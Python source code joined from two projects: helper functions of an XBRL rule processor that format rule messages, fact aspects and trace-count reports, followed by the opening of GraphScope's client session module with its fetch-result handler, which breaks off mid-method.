def result_message(rule_ast, result_ast, xule_value, xule_context):
    """Evaluate one result expression of a rule (message, rule-focus, etc.).

    Arguments:
        rule_ast (dict): AST node of the rule
        result_ast (dict): AST node of the result being produced
        xule_value (XuleValue): the rule's value, exposed to the message as the
            'rule-value' tag
        xule_context (XuleContext): the processing context

    Returns a ModelObject (or list of them) for 'rule-focus', a XuleValue for
    'message', otherwise the string form of the evaluated value.
    """
    # validate_result_name(result_ast, xule_context)
    message_context = xule_context.create_message_copy(rule_ast['node_id'], xule_context.get_processing_id(rule_ast['node_id']))
    message_context.tags['rule-value'] = xule_value
    try:
        # Caching does not work for expressions with tagRefs. The results portion of a rule will have a tagRef for each varRef. This conversion is
        # done during the post parse step. So it is neccessary to turn local caching off when evaluating the result expression. There is a command line option
        # for doing this. This code will turn this command line option on.
        saved_no_cache = getattr(message_context.global_context.options, 'xule_no_cache', False)
        # if hasattr(message_context.global_context.options, 'xule_no_cache'):
        # xule_context.global_context.options.xule_no_cache = True
        xule_context.global_context.options.xule_no_cache = True
        message_value = evaluate(result_ast['resultExpr'], message_context)
    except XuleIterationStop as xis:
        raise XuleProcessingError(_("Cannot produce message. An expression in the message has a skip value."),
                                  xule_context)
    finally:
        # Restore the caller's caching option. NOTE(review): the flag is read from
        # message_context but restored on xule_context — presumably both share the
        # same global_context; confirm.
        # if hasattr(message_context.global_context.options, 'xule_no_cache'):
        #
        xule_context.global_context.options.xule_no_cache = saved_no_cache
    if result_ast['resultName'] == 'rule-focus':
        # This is a special case. rule-focus requires some kind of a ModelObject. This will be passed to the logger as the modelObject argument.
        # Xule will allow a ModelFact or a ModelConcept
        if message_value.type == 'concept':
            message = message_value.value
        elif message_value.is_fact:
            message = message_value.fact
        elif message_value.type in ('list','set'):
            # The rule focus is a list/set of concepts or facts. The list/set cannot be nested
            message = []
            for rule_focus_item in message_value.value:
                if rule_focus_item.type == 'concept':
                    message.append(rule_focus_item.value)
                elif rule_focus_item.is_fact:
                    message.append(rule_focus_item.fact)
                elif rule_focus_item.type in ('unbound', 'none'):
                    # Missing items are kept as None placeholders.
                    message.append(None)
                else:
                    raise XuleProcessingError(
                        _("The rule-focus of a rule must be a concept or a fact, found {}".format(rule_focus_item.type)),
                        xule_context)
        elif message_value.type in ('unbound', 'none'):
            message = None
        else:
            raise XuleProcessingError(
                _("The rule-focus of a rule must be a concept or a fact, found {}".format(message_value.type)),
                xule_context)
    elif result_ast['resultName'] == 'message':
        # The message keeps its XuleValue form; unbound becomes an empty string value.
        if message_value.type == 'unbound':
            message = XuleValue(xule_context, '', 'string')
        else:
            message = message_value
    else:
        # All other result names are stringified.
        if message_value.type == 'unbound':
            message = ''
        else:
            message = str(message_value.value)
    return message
def validate_result_name(result, xule_context):
    """Check that a rule result name is built in or declared as an output attribute.

    Built-in names ('message', 'severity', 'rule-suffix', 'rule-focus') are always valid;
    any other name must have an output-attribute declaration in the rule set.
    Raises XuleProcessingError for undeclared names.
    """
    if result['resultName'] not in ('message', 'severity', 'rule-suffix', 'rule-focus'):
        if not xule_context.rule_set.hasOutputAttribute(result['resultName']):
            # Pass xule_context so this error is reported like every other
            # XuleProcessingError raised in this module (it was omitted before).
            raise XuleProcessingError(_(
                "Rule '{}' uses result name '{}' which does not have an output-attribute declaration.".format(
                    xule_context.rule_name, result['resultName'])), xule_context)
def get_all_aspects(model_fact, xule_context):
    '''Get all the aspects of a fact.

    Delegates to get_alignment() with empty non-align/align sets so nothing is filtered out.'''
    return get_alignment(model_fact, {}, {}, xule_context)
def get_alignment(model_fact, non_align_aspects, align_aspects, xule_context, covered_dims=False, covered=False):
    '''Build the alignment for a fact.

    The alignment contains the aspect/member pairs that are on the fact but not in
    non_align_aspects. It is determined in two steps: first the builtin aspects,
    then the dimensions.

    non_align_aspects/align_aspects are dictionaries keyed by a tuple:
        0 = TYPE - 'builtin' or 'explicit_dimension'
        1 = ASPECT - the aspect name
        2 = SPECIALVALUE - 'all' or 'allWithDefault'
        value = MEMBER (None if there is a SPECIAL_VALUE)

    covered_dims excludes all dimensions unless explicitly aligned; covered excludes
    all aspects unless explicitly aligned.
    '''
    alignment = {}

    # builtin alignment
    if covered:
        # Don't need the non_align_builtins, so don't bother creating them.
        non_align_builtins = None
    else:
        non_align_builtins = {aspect_info[ASPECT] for aspect_info in non_align_aspects if aspect_info[TYPE] == 'builtin'}
    align_builtins = {aspect_info[ASPECT] for aspect_info in align_aspects if aspect_info[TYPE] == 'builtin'}

    # Only need to go through the builtins if they are not covered, or they are covered
    # but there are explicitly aligned builtins.
    if not covered or len(align_builtins) > 0:
        # concept (line item)
        if (not covered and 'concept' not in non_align_builtins) or 'concept' in align_builtins:
            alignment[('builtin', 'concept')] = model_fact.qname
        # unit (numeric facts only)
        if model_fact.isNumeric:
            if (not covered and 'unit' not in non_align_builtins) or 'unit' in align_builtins:
                alignment[('builtin', 'unit')] = model_to_xule_unit(model_fact.unit, xule_context)
        # period
        if (not covered and 'period' not in non_align_builtins) or 'period' in align_builtins:
            alignment[('builtin', 'period')] = model_to_xule_period(model_fact.context, xule_context)
        # entity
        if (not covered and 'entity' not in non_align_builtins) or 'entity' in align_builtins:
            alignment[('builtin', 'entity')] = model_to_xule_entity(model_fact.context, xule_context)

    # dimensional aspects
    if covered_dims or covered:
        # Non aligned dimensions don't matter. (This variable was previously misspelled
        # 'non_align_dimesnions'; it is only read when dimensions are not covered, so
        # the misspelling was a latent NameError trap.)
        non_align_dimensions = set()
    else:
        non_align_dimensions = {aspect_info[ASPECT] for aspect_info in non_align_aspects if
                                aspect_info[TYPE] == 'explicit_dimension'}
    align_dimensions = {aspect_info[ASPECT] for aspect_info in align_aspects if
                        aspect_info[TYPE] == 'explicit_dimension'}

    # Only need to run through the dimensions if they are not covered, or they are
    # covered but there are explicitly aligned dimensions.
    if (not covered_dims and not covered) or len(align_dimensions) > 0:
        for fact_dimension_qname, dimension_value in model_fact.context.qnameDims.items():
            if (not covered_dims and not covered and fact_dimension_qname not in non_align_dimensions) or fact_dimension_qname in align_dimensions:
                alignment[('explicit_dimension',  # This will include typed dimensions as well as explicit.
                           fact_dimension_qname)] = dimension_value.memberQname if dimension_value.isExplicit else dimension_value.typedMember.xValue

    return alignment
def get_uncommon_aspects(model_fact, common_aspects, xule_context):
    """Return the fact's aspects that are not in common_aspects (concept is always kept)."""
    fact_aspects = get_all_aspects(model_fact, xule_context)
    concept_key = ('builtin', 'concept')
    return {aspect_info: aspect_value
            for aspect_info, aspect_value in fact_aspects.items()
            if aspect_info == concept_key or aspect_info not in common_aspects}
def format_alignment(aspects, xule_context):
    """Render an aspect dictionary as '<concept>[aspect=value, ...]' for trace/message output."""
    if len(aspects) == 0:
        return ''

    line_item_string = ""
    aspect_strings = []

    # built in aspects
    if ('builtin', 'concept') in aspects:
        line_item_string = format_qname(aspects[('builtin', 'concept')], xule_context)

    if ('builtin', 'period') in aspects:
        period_info = aspects[('builtin', 'period')]
        one_day = datetime.timedelta(days=1)
        if isinstance(period_info, tuple):
            # A tuple is a duration; min..max means forever.
            if period_info[0] == datetime.datetime.min and period_info[1] == datetime.datetime.max:
                aspect_strings.append("period=forever")
            else:
                # End dates are stored as midnight of the next day; shift back for display.
                aspect_strings.append("period=duration('%s', '%s')" % (
                    period_info[0].strftime("%Y-%m-%d"),
                    (period_info[1] - one_day).strftime("%Y-%m-%d")))
        else:
            aspect_strings.append(
                "period=instant('%s')" % (period_info - one_day).strftime("%Y-%m-%d"))

    if ('builtin', 'unit') in aspects:
        aspect_strings.append(str(aspects[('builtin', 'unit')]))

    if ('builtin', 'entity') in aspects:
        entity_info = aspects[('builtin', 'entity')]
        aspect_strings.append("entity=(%s) %s" % (entity_info[0], entity_info[1]))

    # dimensions, sorted by the dimension qname
    dimension_items = sorted(
        ((aspect_info, aspect_member)
         for aspect_info, aspect_member in aspects.items()
         if aspect_info[TYPE] == 'explicit_dimension'),
        key=lambda pair: pair[0][ASPECT])
    for aspect_info, aspect_member in dimension_items:
        '''THE formatted_member SHOULD HANDLE FORMATTING OF NON QNAME VALUES'''
        formatted_member = (format_qname(aspect_member, xule_context)
                            if type(aspect_member) == QName else aspect_member)
        aspect_strings.append("%s=%s" % (format_qname(aspect_info[ASPECT], xule_context), formatted_member))

    if len(aspect_strings) > 0:
        return line_item_string + "[" + ",\n".join(aspect_strings) + "]"
    return line_item_string
def format_fact_line_item(xule_context, xule_fact):
    """Format the fact's concept qname using the rule set's declared prefixes."""
    return format_qname(xule_fact.fact.concept.qname, xule_context)
def format_fact_period(xule_context, xule_fact):
    """Format the fact's period as m/d/Y dates (end dates shifted back one day) or 'Forever'."""
    model_context = xule_fact.fact.context
    one_day = datetime.timedelta(days=1)
    if model_context.isStartEndPeriod:
        return (model_context.startDatetime.strftime("%m/%d/%Y") + " - " +
                (model_context.endDatetime - one_day).strftime("%m/%d/%Y"))
    if model_context.isInstantPeriod:
        # The model stores instants as midnight of the next day; shift back for display.
        return (model_context.endDatetime - one_day).strftime("%m/%d/%Y")
    return "Forever"
def format_fact_unit(xule_context, xule_fact):
    """Format a numeric fact's unit as 'a * b' or 'num/denom'; None for non-numeric facts."""
    if not xule_fact.fact.isNumeric:
        return None
    numerator = tuple(sorted(xule_fact.fact.unit.measures[0]))
    denominator = tuple(sorted(xule_fact.fact.unit.measures[1]))
    numerator_string = " * ".join(measure.localName for measure in numerator)
    if len(denominator) == 0:
        # no denominator
        return numerator_string
    return "%s/%s" % (numerator_string,
                      " * ".join(measure.localName for measure in denominator))
def format_fact_all_aspects(xule_context, xule_fact):
    """Format the fact's line item, period, unit and dimensions as a multi-line string."""
    parts = ["Line Item: " + format_fact_line_item(xule_context, xule_fact),
             "Period: " + format_fact_period(xule_context, xule_fact)]
    unit = format_fact_unit(xule_context, xule_fact)
    if unit is not None:
        parts.append("Unit: " + unit)
    dimensions = format_fact_dimensions(xule_context, xule_fact)
    if dimensions is not None:
        parts.append("Dimensions:\n" + dimensions)
    return "\n".join(parts)
def format_fact_dimensions(xule_context, xule_fact):
    """Format the fact's dimension/member pairs one per line; None when it has no dimensions."""
    qname_dims = xule_fact.fact.context.qnameDims
    if len(qname_dims) == 0:
        return None
    return "\n".join(
        format_qname(axis_qname, xule_context) + " = " +
        format_qname(qname_dims[axis_qname].memberQname, xule_context)
        for axis_qname in sorted(qname_dims))
def format_fact_label(xule_context, fact):
    """Return the fact's concept label text, or 'missing' when there is no label."""
    label = property_label(xule_context, fact)
    if label.type in ('unbound', 'none'):
        return "missing"
    return label.value.textValue
def format_qname(qname, xule_context):
    """Format a qname using the rule set's declared prefix; a '*' prefix means local name only."""
    namespace_info = xule_context.rule_set.getNamespaceInfoByUri(qname.namespaceURI)
    if not namespace_info:
        # No declared prefix for this namespace; fall back to the qname's own string form.
        return str(qname)
    if namespace_info['prefix'] == '*':
        return qname.localName
    return namespace_info['prefix'] + ":" + qname.localName
# Sub-part names that may follow a tag in a rule message, each mapped to the
# function that formats that part of the tagged fact.
MESSAGE_TAG_SUB_PARTS = (('context', format_alignment),
                         ('label', format_fact_label),
                         ('concept', format_fact_line_item),
                         ('period', format_fact_period),
                         ('unit', format_fact_unit),
                         ('aspects', format_fact_all_aspects),
                         ('dimensions', format_fact_dimensions)
                         )
def write_trace_count_string(trace_count_file, rule_name, traces, rule_part, total_iterations, total_time):
    """Append a human-readable trace-count report for one rule to <trace_count_file>.txt."""
    report = display_trace_count(traces, rule_part, total_iterations, total_time)
    with open(trace_count_file + ".txt", 'a', newline='') as report_file:
        report_file.write(report)
def display_trace_count(traces, rule_part, total_iterations, total_time, level=0, display_string=""):
    """Recursively render a human-readable trace-count report for rule_part and its children.

    Arguments:
        traces (dict): trace counters keyed by AST node_id
        rule_part (ParseResults): the AST node to report on
        total_iterations (int): total iteration count for the rule (for percentages)
        total_time (timedelta): total evaluation time for the rule (for percentages)
        level (int): indentation depth of rule_part in the report
        display_string (str): accumulated report text

    Returns the accumulated report string.
    """
    if isinstance(rule_part, ParseResults):
        # Build an annotation describing the node (variable/function names, flags).
        additional = ''
        if rule_part['exprName'] == 'varRef':
            if rule_part.is_constant:
                additional = " ($" + rule_part.varName + " declaration: " + str(
                    rule_part.var_declaration) + ") - constant)"
            else:
                additional = " ($" + rule_part.varName + " declaration: " + str(rule_part.var_declaration) + ")"
        elif rule_part['exprName'] == 'varAssign':
            additional = " (" + rule_part.varName + ")" + (" NOT USED" if rule_part.get('not_used') == True else "")
        elif rule_part['exprName'] == 'constantAssign':
            additional = " (" + rule_part.constantName + ")"
        elif rule_part['exprName'] == 'functionArg':
            additional = " (" + rule_part.argName + ")"
        elif rule_part['exprName'] == 'forExpr':
            additional = " (" + rule_part.forControl.forVar + ")"
        elif rule_part['exprName'] == 'reportDeclaration':
            additional = " (" + rule_part.reportName + ")"
        elif rule_part['exprName'] == 'raiseDeclaration':
            additional = " (" + rule_part.raiseName + ")"
        elif rule_part['exprName'] == 'formulaDeclaration':
            additional = " (" + rule_part.formulaName + ")"
        # elif rule_part['exprName'] in ('functionDeclaration', 'functionReference'):
        #    additional = " (" + rule_part.functionName + ")" + (" CACHEABLE" if rule_part.get('cacheable') == True else "")
        # Summarize evaluation attributes: instance/rules-taxonomy use, cardinality,
        # alignment, dependency, dependent iterables, values expression and table id.
        if rule_part.number != '':
            additional += (" [" +
                           ('i, ' if rule_part.get('instance') else '') +
                           ('r, ' if rule_part.get('rules-taxonomy') else '') +
                           ('1' if rule_part.number == 'single' else "*") +
                           (", Align" if rule_part.has_alignment else ", NoAlign") +
                           ((", " + ("D" if rule_part.is_dependent else "I")) if 'is_dependent' in rule_part else "") +
                           # ((", " + str(parse_res.var_refs)) if len(parse_res.var_refs) > 0 else "") +
                           # ((", v" + str({(x[0], x[1]) for x in rule_part.dependent_vars})) if len(rule_part.dependent_vars) > 0 else "") +
                           # ((", V" + str({(x[0], x[1]) for x in rule_part.var_refs})) if len(rule_part.var_refs) > 0 else "") +
                           # ((", VIds" + str(rule_part.var_ref_ids)) if 'var_ref_ids' in rule_part else "") +
                           ((", i" + str({dep['node_id'] for dep in rule_part.dependent_iterables})) if len(
                               rule_part.dependent_iterables) > 0 else "") +
                           # ((", di" + str({dep['node_id'] for dep in rule_part.downstream_iterables})) if len(rule_part.downstream_iterables) > 0 else "") +
                           (", Values" if rule_part.get('values_expression') == True else "") +
                           (", Table %i" % rule_part.table_id if rule_part.get('table_id') is not None else "") +
                           "]")
        if 'is_iterable' in rule_part:
            additional += " iterable"
        if 'in_loop' in rule_part:
            additional += " LOOP"
        display_string += (" " * level) + str(rule_part['node_id']) + ":" + rule_part['exprName'] + additional + "\n"
        if rule_part['node_id'] in traces:
            trace = traces[rule_part['node_id']]
            total_count = 0
            # display_string += ", ".join(trace.keys()) + "\n"
            # Report each evaluation-type counter that fired for this node.
            for key in ('iterations', 'U', 'E', 'c', 'T', 'e', 'R', 'r', 'isE', 'ise', 'isu', 'ex'):
                if trace[key] > 0:
                    if key == 'iterations':
                        display_string += "{}{} {} {}\n".format(" " * (level + 1),
                                                                key,
                                                                trace[key],
                                                                (trace[
                                                                     key] / total_iterations) if total_iterations > 0 else 0)
                        # add step values
                        children_time, child_nodes = trace_count_next_time(rule_part, traces)
                        step_time = trace['iterations-t'] - children_time
                        display_string += "{}{} {} {} {}\n".format(" " * (level + 1),
                                                                   "Step",
                                                                   step_time.total_seconds(),
                                                                   (
                                                                       step_time / total_time) if total_time.total_seconds() > 0 else 0,
                                                                   str(child_nodes)[1:-1])
                    else:
                        try:
                            display_string += "{}{} {} - Avg: {} Tot: {} - Avg: {:%} Tot: {:%}\n".format(
                                " " * (level + 2),
                                key,
                                trace[key],
                                trace[key + '-t'].total_seconds() / trace[key] if trace[key] > 0 else 0,
                                trace[key + '-t'].total_seconds(),
                                ((trace[key + '-t'].total_seconds() / trace[key] if trace[
                                                                                       key] > 0 else 0) / total_iterations) if total_iterations > 0 else 0,
                                (trace[key + '-t'] / total_time) if total_time.total_seconds() > 0 else 0)
                        except:
                            print("key", key, "key time", trace[key + '-t'])
                            raise
                if key != 'iterations':
                    total_count += trace[key]
            if total_count != trace['iterations']:
                display_string += "%sCalc Total %i\n" % (" " * (level + 1), total_count)
            display_string += "%sTime %f Average %f\n\n" % (" " * (level + 1), trace['iterations-t'].total_seconds(), (
                trace['iterations-t'].total_seconds() / total_count) if total_count > 0 else 0)
        for next_part in rule_part:
            display_string = display_trace_count(traces, next_part, total_iterations, total_time, level + 1,
                                                 display_string)
    return display_string
def write_trace_count_csv(trace_count_file, rule_name, traces, rule_part, total_iterations, total_time):
    """Append the trace-count report for one rule to <trace_count_file>.csv."""
    import csv
    rows = calc_trace_count(rule_name, traces, rule_part, total_iterations, total_time)
    with open(trace_count_file + ".csv", 'a', newline='') as csv_file:
        csv.writer(csv_file).writerows(rows)
def calc_trace_count(rule_name, traces, rule_part, total_iterations, total_time, level=0, rows=None):
    """Recursively build the rows of the trace-count CSV report for rule_part and its children.

    Arguments:
        rule_name (str): name of the rule being reported
        traces (dict): trace counters keyed by AST node_id
        rule_part (ParseResults): the AST node to report on
        total_iterations (int): total iteration count for the rule (for percentages)
        total_time (timedelta): total evaluation time for the rule (for percentages)
        level (int): indentation depth of rule_part in the report
        rows (list): accumulated rows; the two header rows are created on the first call

    Returns the list of report rows.
    """
    if rows is None:
        rows = [['', '', '', '', '', '', '', '', '', '', ''
                 , 'Total', '', '', '', '', ''  # total iterations
                 , 'Step', '', '', '', ''  # Step time
                 , 'Evaluations', '', '', '', '', ''  # Evaluations
                 , 'Table', '', '', '', '', ''  # Table
                 , 'Cache', '', '', '', '', ''  # cache
                 , 'Recalc', '', '', '', '', ''  # Recalc
                 , 'Stop', '', '', '', '', ''  # Iteration Stop
                 ],
                ['Rule', 'Id', 'Name', 'Notes', 'Instance', 'Rule Taxonomy', 'Number', 'Aligned', 'Dependent',
                 'Dependent Iterables', 'Iterable'
                 , 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %'  # total iterations
                 , 'secs', 'secs %', 'avg', 'avg %', 'nodes'  # step times
                 , 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %'  # Evaluations
                 , 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %'  # Table
                 , 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %'  # cache
                 , 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %'  # Recalc
                 , 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %'  # Iteration Stop
                 ]]
    # Rows: name, notes, inst, rule tax, number, aligned, dependency, dependent iterables, iterable,
    # For each count includes: iterations, percent, time, percent, avg time, percent
    # total, E, T, c, R, is
    if isinstance(rule_part, ParseResults):
        # Build a notes annotation describing the node (variable/function names, flags).
        additional = ''
        if rule_part['exprName'] == 'varRef':
            if rule_part.is_constant:
                additional = "$" + rule_part.varName + " declaration: " + str(
                    rule_part.var_declaration) + " - constant)"
            else:
                additional = "$" + rule_part.varName + " declaration: " + str(rule_part.var_declaration)
        elif rule_part['exprName'] == 'varAssign':
            additional = rule_part.varName + (" NOT USED" if rule_part.get('not_used') == True else "")
        elif rule_part['exprName'] == 'constantAssign':
            additional = rule_part.constantName
        elif rule_part['exprName'] == 'functionArg':
            additional = rule_part.argName
        elif rule_part['exprName'] == 'forExpr':
            additional = rule_part.forControl.forVar
        elif rule_part['exprName'] == 'reportDeclaration':
            additional = rule_part.reportName
        elif rule_part['exprName'] == 'raiseDeclaration':
            additional = rule_part.raiseName
        elif rule_part['exprName'] == 'formulaDeclaration':
            additional = rule_part.formulaName
        elif rule_part['exprName'] in ('functionDeclaration', 'functionReference'):
            additional = rule_part.functionName + (" CACHEABLE" if rule_part.get('cacheable') == True else "")
        row = [rule_name
               , rule_part['node_id']
               , (' ' * level) + rule_part['exprName']  # name
               , additional  # notes
               , True if rule_part.get('instance') else False  # instance
               , True if rule_part.get('rules-taxonomy') else False  # rule taxonomy
               , rule_part.number == 'single'  # number
               , True if rule_part.has_alignment else False  # aligned
               , ("D" if rule_part.is_dependent else "I") if 'is_dependent' in rule_part else ""  # dependency
               , str({dep['node_id'] for dep in rule_part.dependent_iterables}) if len(
                rule_part.dependent_iterables) > 0 else ""  # dependent iterables
               , 'is_iterable' in rule_part  # iterable
               ]
        if rule_part['node_id'] in traces:
            trace = traces[rule_part['node_id']]
            # add total values to the row
            row += trace_count_by_type('iterations', trace, total_iterations, total_time)
            # add step values (this node's time minus its traced children's time)
            children_time, child_nodes = trace_count_next_time(rule_part, traces)
            step_time = trace['iterations-t'] - children_time
            row += [step_time.total_seconds()
                    , ((
                           step_time.total_seconds() / total_time.total_seconds()) if total_time.total_seconds() > 0 else 0) * 100
                    , (step_time.total_seconds() / trace['iterations']) if trace['iterations'] > 0 else 0
                    , ((((step_time.total_seconds() / trace['iterations']) if trace[
                                                                                  'iterations'] > 0 else 0) / total_iterations) if total_iterations > 0 else 0) * 100
                    , str(child_nodes)[1:-1]]
            # add values by evaluation type
            calc_total = 0
            for count_codes in [['E', 'e'], ['T'], ['c'], ['R', 'r'], ['isE', 'ise']]:
                if len(count_codes) == 1:
                    count_code = count_codes[0]
                else:
                    # Prefer the first code; fall back to the second when the first never fired.
                    count_code = count_codes[0] if trace[count_codes[0]] != 0 else count_codes[1]
                calc_total += trace[count_code]
                row += trace_count_by_type(count_code, trace, total_iterations, total_time)
            if calc_total != trace['iterations']:
                # Fixed: list.append() takes one argument; the original passed two, which
                # raised a TypeError whenever the counts did not total.
                row.append("ITERATION COUNT DOES NOT TOTAL. Calc total is %i" % calc_total)
        rows.append(row)
        for next_part in rule_part:
            rows = calc_trace_count(rule_name, traces, next_part, total_iterations, total_time, level + 1, rows)
    return rows
def trace_count_by_type(count_code, trace, total_iterations, total_time):
    """Return the six report columns (count, '', secs, secs %, avg, avg %) for one counter."""
    count = trace[count_code]
    seconds = trace[count_code + '-t'].total_seconds()
    total_seconds = total_time.total_seconds()
    average = (seconds / count) if count > 0 else 0
    return [count
            , ''  # count percentage column is filled in elsewhere
            , seconds
            , (seconds / total_seconds * 100) if total_seconds > 0 else 0
            , average
            , ((average / total_iterations) if total_iterations > 0 else 0) * 100
            ]
def trace_count_next_time(rule_part, traces):
    """Sum the iteration time already attributed to the direct children of
    ``rule_part``, so a caller can subtract it and get the node's own time.

    A child with its own entry in ``traces`` contributes its total
    'iterations-t' time; an untraced child is searched recursively so its
    descendants' time is charged instead.  Children named 'varAssign' are
    skipped entirely.

    Args:
        rule_part: A pyparsing ``ParseResults`` node; any other type yields
            an empty result.
        traces: Mapping from node_id to per-node trace dicts.

    Returns:
        tuple: (total child time as ``datetime.timedelta``,
        list of contributing child node ids).
    """
    total_child_times = datetime.timedelta()
    total_child_nodes = []
    if isinstance(rule_part, ParseResults):
        for child in rule_part:
            if isinstance(child, ParseResults):
                # NOTE(review): assumes every ParseResults child carries
                # 'exprName' and 'node_id' entries -- confirm with the grammar
                # that builds these results.
                if child['exprName'] != 'varAssign':
                    if child['node_id'] in traces:
                        total_child_times += traces[child['node_id']]['iterations-t']
                        total_child_nodes.append(child['node_id'])
                        # return (traces[child['node_id']]['iterations-t'], child['node_id'])
                    else:
                        # untraced node: recurse and charge its children's time
                        child_info = trace_count_next_time(child, traces)
                        total_child_times += child_info[0]
                        total_child_nodes += child_info[1]
    return (total_child_times, total_child_nodes)
|
session.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Manage sessions to the GraphScope coordinator.
"""
import atexit
import base64
import contextlib
import json
import logging
import os
import pickle
import signal
import sys
import threading
import time
import uuid
import warnings
try:
from kubernetes import client as kube_client
from kubernetes import config as kube_config
except ImportError:
kube_client = None
kube_config = None
import graphscope
from graphscope.client.rpc import GRPCClient
from graphscope.client.utils import CaptureKeyboardInterrupt
from graphscope.client.utils import GSLogger
from graphscope.client.utils import SignalIgnore
from graphscope.client.utils import set_defaults
from graphscope.config import GSConfig as gs_config
from graphscope.deploy.hosts.cluster import HostsClusterLauncher
from graphscope.deploy.kubernetes.cluster import KubernetesClusterLauncher
from graphscope.framework.dag import Dag
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import InteractiveEngineInternalError
from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import K8sError
from graphscope.framework.graph import Graph
from graphscope.framework.graph import GraphDAGNode
from graphscope.framework.operation import Operation
from graphscope.framework.utils import decode_dataframe
from graphscope.framework.utils import decode_numpy
from graphscope.interactive.query import InteractiveQuery
from graphscope.interactive.query import InteractiveQueryDAGNode
from graphscope.interactive.query import InteractiveQueryStatus
from graphscope.proto import graph_def_pb2
from graphscope.proto import message_pb2
from graphscope.proto import op_def_pb2
from graphscope.proto import types_pb2
# Path of the JSON file that supplies default session parameters; may be
# overridden through the GS_CONFIG_PATH environment variable.
DEFAULT_CONFIG_FILE = os.environ.get(
    "GS_CONFIG_PATH", os.path.expanduser("~/.graphscope/session.json")
)
# Registry of live sessions keyed by session id (entries removed on close).
_session_dict = {}
logger = logging.getLogger("graphscope")
class _FetchHandler(object):
    """Handler for structured fetches.
    This class takes care of extracting a sub-DAG as targets for a user-provided structure for fetches,
    which can be used for a low level `run` call of grpc_client.
    Given the results of the low level run call, this class can also rebuild a result structure
    matching the user-provided structure for fetches, but containing the corresponding results.
    """

    def __init__(self, dag, fetches):
        """Resolve ``fetches`` to operations and extract the matching sub-DAG.

        Args:
            dag: The session-wide DAG to slice.
            fetches: A single fetchable (an :class:`Operation`, or any object
                exposing an ``op`` attribute) or a list/tuple of them.

        Raises:
            ValueError: If a fetch cannot be resolved to an :class:`Operation`.
        """
        self._fetches = fetches
        self._ops = list()
        # a single (non list/tuple) fetch is wrapped here and unwrapped again
        # in `wrap_results`
        self._unpack = False
        if not isinstance(self._fetches, (list, tuple)):
            self._fetches = [self._fetches]
            self._unpack = True
        for fetch in self._fetches:
            if hasattr(fetch, "op"):
                fetch = fetch.op
            if not isinstance(fetch, Operation):
                raise ValueError("Expect a `Operation` in sess run method.")
            self._ops.append(fetch)
        # extract sub dag
        self._sub_dag = dag.extract_subdag_for(self._ops)
        if "debug" in os.environ:
            logger.info("sub_dag: %s", self._sub_dag)

    @property
    def targets(self):
        # the extracted sub-DAG to submit to the coordinator
        return self._sub_dag

    def _rebuild_graph(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
        """Rebuild a client-side :class:`Graph` for the ``seq``-th fetch."""
        if isinstance(self._fetches[seq], Operation):
            # for nx Graph
            return op_result.graph_def
        # get graph dag node as base
        graph_dag_node = self._fetches[seq]
        # construct graph
        g = Graph(graph_dag_node)
        # update graph field from graph_def
        g.update_from_graph_def(op_result.graph_def)
        return g

    def _rebuild_learning_graph(
        self, seq, op: Operation, op_result: op_def_pb2.OpResult
    ):
        """Rebuild a learning-engine graph from the op result's handle/config."""
        from graphscope.learning.graph import Graph as LearningGraph

        # handle is a base64-encoded JSON blob produced by the coordinator
        handle = op_result.handle
        handle = json.loads(base64.b64decode(handle).decode("utf-8"))
        config = op_result.config.decode("utf-8")
        handle["server"] = op_result.result.decode("utf-8")
        handle["client_count"] = 1
        graph_dag_node = self._fetches[seq]
        # construct learning graph
        g = LearningGraph(
            graph_dag_node, handle, config, op_result.extra_info.decode("utf-8")
        )
        return g

    def _rebuild_interactive_query(
        self, seq, op: Operation, op_result: op_def_pb2.OpResult
    ):
        """Rebuild an :class:`InteractiveQuery` (gremlin endpoint) handle."""
        # get interactive query dag node as base
        interactive_query_node = self._fetches[seq]
        # construct interactive query
        interactive_query = InteractiveQuery(
            interactive_query_node,
            op_result.result.decode("utf-8"),
            op_result.extra_info.decode("utf-8"),
        )
        interactive_query.status = InteractiveQueryStatus.Running
        return interactive_query

    def _rebuild_app(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
        """Rebuild a bound :class:`App` object from the op result."""
        from graphscope.framework.app import App

        # get app dag node as base
        app_dag_node = self._fetches[seq]
        # construct app
        app = App(app_dag_node, op_result.result.decode("utf-8"))
        return app

    def _rebuild_context(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
        """Rebuild the context produced by an app run, typed by the result JSON."""
        from graphscope.framework.context import Context
        from graphscope.framework.context import DynamicVertexDataContext

        # get context dag node as base
        context_dag_node = self._fetches[seq]
        ret = json.loads(op_result.result.decode("utf-8"))
        context_type = ret["context_type"]
        if context_type == "dynamic_vertex_data":
            # for nx
            return DynamicVertexDataContext(context_dag_node, ret["context_key"])
        else:
            return Context(context_dag_node, ret["context_key"], ret["context_schema"])

    def _rebuild_gremlin_results(
        self, seq, op: Operation, op_result: op_def_pb2.OpResult
    ):
        """Rebuild a gremlin :class:`ResultSet` handle."""
        from graphscope.interactive.query import ResultSet

        # get result set node as base
        result_set_dag_node = self._fetches[seq]
        return ResultSet(result_set_dag_node)

    def wrap_results(self, response: message_pb2.RunStepResponse):
        """Map raw op results in ``response`` back onto the fetch structure.

        For each fetched op, locate its result by key and rebuild the
        client-side value according to the op's declared output type.
        Returns a single value when the user passed a single fetch, else a
        list in fetch order.
        """
        rets = list()
        for seq, op in enumerate(self._ops):
            for op_result in response.results:
                if op.key == op_result.key:
                    if op.output_types == types_pb2.RESULTS:
                        if op.type == types_pb2.RUN_APP:
                            rets.append(self._rebuild_context(seq, op, op_result))
                        elif op.type == types_pb2.FETCH_GREMLIN_RESULT:
